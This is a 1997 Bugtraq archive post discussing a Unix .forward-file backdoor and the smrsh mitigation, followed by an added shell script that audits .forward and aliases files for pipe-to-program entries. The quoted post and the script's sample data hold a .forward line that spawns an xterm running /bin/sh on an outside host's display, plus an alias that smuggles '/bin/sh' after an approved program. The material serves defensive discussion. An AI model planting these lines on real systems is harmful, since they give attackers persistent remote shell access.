Bugtraq mailing list archives
Re: Backdoor Paper
From: avalon () COOMBS ANU EDU AU (Darren Reed)
Date: Tue, 26 Aug 1997 10:31:36 +1000
In some mail from Evil Pete, sie said:
> Here's a paper I wrote on backdoors. Feedback welcome.
> <snip>
> you may want to add:
>
> .forward Backdoor
>
> On Unix machines, placing commands into the .forward file was also a
> common method of regaining access. For the account ``username'' a
> .forward file might be constructed as follows:
>
>     \username
>     |"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"
>
> Permutations of this method include alteration of the system's mail
> aliases file (most commonly located at /etc/aliases). Note that this is
> a simple permutation; the more advanced can run a simple script from the
> .forward file that can take arbitrary commands via stdin (after minor
> preprocessing).
>
> -Pete
>
> PS: The above method is also useful for gaining access to a company's
> mailhub (assuming there is a shared home directory FS on the client and
> server).
Using smrsh can effectively negate this backdoor (although it's quite
possibly still a problem if you allow things like elm's filter or procmail,
which can run programs themselves...).

Darren
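As an added illustration of the exchange above (this script is not part of the original thread and is not sendmail's or smrsh's own code), the following POSIX sh audit walks a .forward file and an aliases file, picks out every "pipe to program" entry, and reports which ones smrsh would refuse. The smrsh rule it models is the one the man page describes: the directory part of the program is discarded, the bare name must exist in smrsh's program directory, and command lines carrying shell metacharacters are rejected outright. The program directory is passed as an argument because it varies by platform (sendmail's historical default is /usr/adm/sm.bin; many Linux builds use /etc/smrsh); the sample .forward, aliases file and fake "vacation" binary are constructed inside the demo function and are assumptions, not data from the post.

```shell
#!/bin/sh
# Added example, not from the original thread: audit .forward / aliases
# entries for pipe-to-program deliveries and predict smrsh's verdict.
# Assumption: smrsh's allowed-program directory is given as $2 (the
# historical default is /usr/adm/sm.bin; Linux builds often use /etc/smrsh).

# audit_pipes FILE SMRSH_DIR
# Prints one line per pipe entry in FILE:   basename(FILE):PROGRAM:VERDICT
audit_pipes() {
    file="$1"; smdir="$2"
    # Drop comments.  Both .forward and aliases allow comma-separated
    # targets as well as one target per line, so split on commas too.
    sed -e 's/#.*$//' "$file" | tr ',' '\n' | while IFS= read -r entry; do
        case "$entry" in
            *\|*) ;;          # "|program" delivery: this is what we audit
            *) continue ;;    # plain address, \user, or blank line
        esac
        # Everything after the first '|', with quotes and leading blanks gone.
        cmdline=$(printf '%s\n' "$entry" | sed -e 's/^[^|]*|//' -e 's/"//g' -e 's/^ *//')
        prog=$(printf '%s\n' "$cmdline" | awk '{print $1}')
        # smrsh rejects command lines containing shell metacharacters
        # (simplified here to ; < > $ and backquote; real smrsh also treats
        # & and | specially, allowing only "&&" and "||").
        if printf '%s\n' "$cmdline" | grep -q '[;<>$`]'; then
            verdict="rejected-shell-metachar"
        # Otherwise the directory is stripped and the bare name must be an
        # executable in smrsh's own directory.
        elif [ -x "$smdir/$(basename "$prog")" ]; then
            verdict="allowed"
        else
            verdict="rejected-not-in-smrsh-dir"
        fi
        printf '%s:%s:%s\n' "$(basename "$file")" "$prog" "$verdict"
    done
}

# demo_audit: build a constructed sample tree and run the audit over it.
demo_audit() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/sm.bin" "$tmp/home/username"
    # Constructed stand-in for an smrsh-approved program.
    printf '#!/bin/sh\nexit 0\n' > "$tmp/sm.bin/vacation"
    chmod +x "$tmp/sm.bin/vacation"
    # The .forward from the post: keep local delivery working, and pop an
    # xterm back to the attacker's display on every incoming message.
    cat > "$tmp/home/username/.forward" <<'EOF'
\username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"
EOF
    # Constructed aliases file: one legitimate pipe, one "end run" attempt
    # that smuggles a second command after an approved program.
    cat > "$tmp/aliases" <<'EOF'
# constructed sample aliases file
postmaster: root
helpdesk: |"/usr/bin/vacation helpdesk"
backup: |"/usr/bin/vacation backup; /bin/sh"
EOF
    audit_pipes "$tmp/home/username/.forward" "$tmp/sm.bin"
    audit_pipes "$tmp/aliases" "$tmp/sm.bin"
    rm -rf "$tmp"
}

demo_audit
```

Run against real data by calling audit_pipes on each user's ~/.forward and on /etc/aliases with the real smrsh directory; an "allowed" verdict still deserves a look, since (as Darren notes) a program such as procmail that is itself permitted by smrsh can go on to run whatever its rc file tells it to.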
Current thread:
- Re: Backdoor Paper Nicolas Dubee (Jul 27)
- <Possible follow-ups>
- Backdoor Paper Christopher Klaus (Aug 16)
- Re: Backdoor Paper Evil Pete (Aug 25)
- Re: Backdoor Paper Darren Reed (Aug 25)